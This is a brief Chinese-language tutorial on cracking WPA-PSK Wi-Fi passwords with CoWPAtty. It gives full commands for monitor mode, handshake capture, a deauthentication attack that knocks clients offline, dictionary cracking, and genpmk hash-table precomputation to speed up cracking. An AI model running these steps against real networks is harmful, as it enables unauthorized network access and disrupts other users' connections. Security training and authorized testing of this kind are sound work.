WPA破解-创建Hash-table加速并用Cowpatty破解

1.Cowpatty 软件介绍

CoWPAtty是WPA-PSK的自动字典攻击工具，它运行在Linux上，该程序具有命令行界面，并使用字典进行密码攻击。

2.渗透流程

1.安装CoWPAtty

cowpatty

如果出现如下报错：

请输入

apt install binutils

即可

2.抓握手包

1.查看网卡

ip a

2.开启监听模式

airmon-ng start wlan0

3.扫描wifi

airodump-ng wlan0mon

4.抓握手包

airodump-ng wlan0mon -c 1 --bssid 10:BD:18:08:43:31 -w wpa-1 
-c:指定信道
--bssid:AP的MAC地址
-w:保存抓包结果

5.进行冲突模式攻击

aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0：冲突攻击模式，后面跟发送次数（设置为 0，则为循环攻击，不停的断开连接，客户端无法正常上网）
-a:设置 ap 的 mac
-c：设置已连接的合法客户端的 mac

3.STA重新连接wifi

成功抓到握手包

4.渗透WPA wifi

cowpatty -f passwd.txt -r  wpa-1-01.cap -s cisco-432F
-f:字典文件
-r:数据包捕获文件
-s:网络SSID（如果SSID包含空格，则使用引号括起来）

密码出来了

5.使用大字典破解

cowpatty -f pwd.txt -r  wpa-1-01.cap -s cisco-432F

可以看到没有加速的情况下，用大字典去跑非常的慢

3.hash-table加速

1.将密码字典生成hash-table

genpmk -f  pwd.txt -d ./pwdhash -s cisco-432F
-s wifi的SSID

生成hask-table速度比较慢，一般要几小时，但是具有可传播性

2.加速渗透

cowpatty -d pwdhash -r  wpa-1-01.cap -s cisco-432F

这里实际上破解密码的速度是加速前的好几十倍

加速效果对比：

400的速度和300000的速度